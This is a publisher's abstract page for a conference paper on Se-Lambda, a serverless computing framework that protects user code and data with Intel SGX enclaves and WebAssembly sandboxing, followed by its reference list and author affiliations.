Advertisement

Se-Lambda: Securing Privacy-Sensitive Serverless Applications Using SGX Enclave

  • Weizhong QiangEmail author
  • Zezhao Dong
  • Hai Jin
Conference paper
Part of the Lecture Notes of the Institute for Computer Sciences, Social Informatics and Telecommunications Engineering book series (LNICST, volume 254)

Abstract

Serverless computing is an emerging trend in the cloud, which represents a new paradigm for deploying applications and services. In the serverless computing framework, cloud users can deploy arbitrary code and process data on the service runtime. However, as neither cloud users nor cloud providers are trustworthy, serverless computing platform suffers from trust issues caused by both sides. In this paper, we propose a new serverless computing framework called Se-Lambda, which protects the API gateway by using SGX enclave and the service runtime by leveraging a two-way sandbox that combines SGX enclave and WebAssembly sandboxed environment. In the proposed service runtime, users’ untrusted code is confined by WebAssembly sandboxed environment, while SGX enclave prevents malicious cloud providers from stealing users’ privacy-sensitive data. In addition, we implement a privilege monitoring mechanism in SGX enclave to manage the access control of function modules from users. We implement the prototype of Se-Lambda based on the open source project OpenLambda. The experimental results show that the Se-Lambda imposes a low performance penalty, while buying a significantly increased level of security.

Keywords

Serverless computing Cloud security Runtime security Intel SGX WebAssembly 

Notes

Acknowledgment

This work is supported by National Basic Research Program of China (973 Program) under grant No. 2014CB340600, National Natural Science Foundation of China under grant No. 61772221, and the Shenzhen Fundamental Research Program under grant No. JCYJ20170413114215614.

References

  1. 1.
  2. 2.
    Arnautov, S., et al.: SCONE: secure Linux containers with Intel SGX. In: Proceedings of the 12th USENIX Symposium on Operating Systems Design and Implementation, pp. 689–703. USENIX Association (2016)Google Scholar
  3. 3.
    Baumann, A., Peinado, M., Hunt, G.: Shielding applications from an untrusted cloud with haven. In: Proceedings of the 11th USENIX Conference on Operating Systems Design and Implementation, pp. 267–283. USENIX Association (2014)Google Scholar
  4. 4.
  5. 5.
    Brenner, S., et al.: SecureKeeper: confidential ZooKeeper using Intel SGX. In: Proceedings of the 17th International Middleware Conference, pp. 1–13. ACM (2016)Google Scholar
  6. 6.
  7. 7.
    Buyya, R., et al.: A manifesto for future generation cloud computing: research directions for the next decade. CoRR abs/1711.09123 (2017)Google Scholar
  8. 8.
    Checkoway, S., Shacham, H.: Iago attacks: why the system call API is a bad untrusted RPC interface. In: Proceedings of the Eighteenth International Conference on Architectural Support for Programming Languages and Operating Systems, pp. 253–264. ACM (2013)Google Scholar
  9. 9.
  10. 10.
    Gentry, C.: A fully homomorphic encryption scheme. Ph.D. thesis, Stanford University (2009)Google Scholar
  11. 11.
    Gentry, C., Halevi, S., Smart, N.P.: Homomorphic evaluation of the AES circuit. In: Safavi-Naini, R., Canetti, R. (eds.) CRYPTO 2012. LNCS, vol. 7417, pp. 850–867. Springer, Heidelberg (2012).  https://doi.org/10.1007/978-3-642-32009-5_49CrossRefGoogle Scholar
  12. 12.
    Hofmann, O.S., Kim, S., Dunn, A.M., Lee, M.Z., Witchel, E.: Inktag: secure applications on an untrusted operating system. In: Proceedings of the Eighteenth International Conference on Architectural Support for Programming Languages and Operating Systems, pp. 265–278. ACM (2013)Google Scholar
  13. 13.
    Hunt, T., Zhu, Z., Xu, Y., Peter, S., Witchel, E.: Ryoan: a distributed sandbox for untrusted computation on secret data. In: Proceedings of the 12th USENIX Conference on Operating Systems Design and Implementation, pp. 533–549. USENIX Association (2016)Google Scholar
  14. 14.
    Jana, S., Porter, D.E., Shmatikov, V.: TxBox: building secure, efficient sandboxes with system transactions. In: Proceedings of the 2011 IEEE Symposium on Security and Privacy, pp. 329–344. IEEE (2011)Google Scholar
  15. 15.
    Karande, V., Bauman, E., Lin, Z., Khan, L.: SGX-log: securing system logs with SGX. In: Proceedings of the 2017 ACM on Asia Conference on Computer and Communications Security, pp. 19–30. ACM (2017)Google Scholar
  16. 16.
    Kwon, Y., Dunn, A.M., Lee, M.Z., Hofmann, O.S., Xu, Y., Witchel, E.: Sego: pervasive trusted metadata for efficiently verified untrusted system services. In: Proceedings of the Twenty-First International Conference on Architectural Support for Programming Languages and Operating Systems, pp. 277–290. ACM (2016)Google Scholar
  17. 17.
    Lee, S., Shih, M.W., Gera, P., Kim, T., Kim, H., Peinado, M.: Inferring fine-grained control flow inside SGX enclaves with branch shadowing. In: Proceedings of the 26th USENIX Security Symposium, pp. 557–574. USENIX Association (2017)Google Scholar
  18. 18.
    Li, Y., McCune, J., Newsome, J., Perrig, A., Baker, B., Drewry, W.: MiniBox: a two-way sandbox for x86 native code. In: Proceedings of the 2014 USENIX Annual Technical Conference, pp. 409–420. USENIX Association (2014)Google Scholar
  19. 19.
    McCune, J.M., et al.: TrustVisor: efficient TCB reduction and attestation. In: Proceedings of the 2010 IEEE Symposium on Security and Privacy, pp. 143–158. IEEE (2010)Google Scholar
  20. 20.
    OpenCV (2018). https://opencv.org/
  21. 21.
    Pires, R., Pasin, M., Felber, P., Fetzer, C.: Secure content-based routing using Intel software guard extensions. In: Proceedings of the 17th International Middleware Conference, pp. 1–10. ACM (2016)Google Scholar
  22. 22.
    Schuster, F., et al.: VC3: trustworthy data analytics in the cloud using SGX. In: Proceedings of the 2015 IEEE Symposium on Security and Privacy, pp. 38–54. IEEE (2015)Google Scholar
  23. 23.
    Seo, J., et al.: SGX-shield: enabling address space layout randomization for SGX programs. In: Proceedings of the 2017 Annual Network and Distributed System Security Symposium (2017)Google Scholar
  24. 24.
    Shih, M.W., Kumar, M., Kim, T., Gavrilovska, A.: S-NFV: securing NFV states by using SGX. In: Proceedings of the 2016 ACM International Workshop on Security in Software Defined Networks and Network Function Virtualization, pp. 45–48. ACM (2016)Google Scholar
  25. 25.
    Shih, M.W., Lee, S., Kim, T., Peinado, M.: T-SGX: eradicating controlled-channel attacks against enclave programs. In: Proceedings of the 2017 Annual Network and Distributed System Security Symposium (2017)Google Scholar
  26. 26.
    Shinde, S., Chua, Z.L., Narayanan, V., Saxena, P.: Preventing page faults from telling your secrets. In: Proceedings of the 11th ACM on Asia Conference on Computer and Communications Security, pp. 317–328. ACM (2016)Google Scholar
  27. 27.
    Shinde, S., Le Tien, D., Tople, S., Saxena, P.: Panoply: low-TCB Linux applications with SGX enclaves. In: Proceedings of the 2017 Annual Network and Distributed System Security Symposium (2017)Google Scholar
  28. 28.
  29. 29.
    Tetali, S.D., Lesani, M., Majumdar, R., Millstein, T.: MrCrypt: static analysis for secure cloud computations. In: Proceedings of the 2013 ACM SIGPLAN International Conference on Object Oriented Programming Systems Languages, and Applications, pp. 271–286. ACM (2013)Google Scholar
  30. 30.
    Tian, H., Zhang, Y., Xing, C., Yan, S.: SGXKernel: a library operating system optimized for Intel SGX. In: Proceedings of the Computing Frontiers Conference, pp. 35–44. ACM (2017)Google Scholar
  31. 31.
    Tsai, C.C., Porter, D.E., Vij, M.: Graphene-SGX: a practical library OS for unmodified applications on SGX. In: Proceedings of the 2017 USENIX Annual Technical Conference, pp. 645–658. USENIX Association (2017)Google Scholar
  32. 32.
    Van Bulck, J., Weichbrodt, N., Kapitza, R., Piessens, F., Strackx, R.: Telling your secrets without page faults: stealthy page table-based attacks on enclaved execution. In: Proceedings of the 26th USENIX Security Symposium, pp. 1041–1056. USENIX Association (2017)Google Scholar
  33. 33.
    WebAssembly (2018). http://webassembly.org/
  34. 34.
    Weichbrodt, N., Kurmus, A., Pietzuch, P., Kapitza, R.: AsyncShock: exploiting synchronisation bugs in Intel SGX enclaves. In: Askoxylakis, I., Ioannidis, S., Katsikas, S., Meadows, C. (eds.) ESORICS 2016. LNCS, vol. 9878, pp. 440–457. Springer, Cham (2016).  https://doi.org/10.1007/978-3-319-45744-4_22CrossRefGoogle Scholar
  35. 35.
    Yee, B., et al.: Native client: a sandbox for portable, untrusted x86 native code. In: Proceedings of the 2009 IEEE Symposium on Security and Privacy, pp. 79–93. IEEE (2009)Google Scholar
  36. 36.
    Zheng, W., Dave, A., Beekman, J.G., Popa, R.A., Gonzalez, J.E., Stoica, I.: Opaque: an oblivious and encrypted distributed analytics platform. In: Proceedings of the 14th USENIX Conference on Networked Systems Design and Implementation, pp. 283–298. USENIX Association (2017)Google Scholar

Copyright information

© ICST Institute for Computer Sciences, Social Informatics and Telecommunications Engineering 2018

Authors and Affiliations

  1. 1.Services Computing Technology and System Lab, Cluster and Grid Computing Lab, Big Data Technology and System Lab, School of Computer Science and TechnologyHuazhong University of Science and TechnologyWuhanChina

Personalised recommendations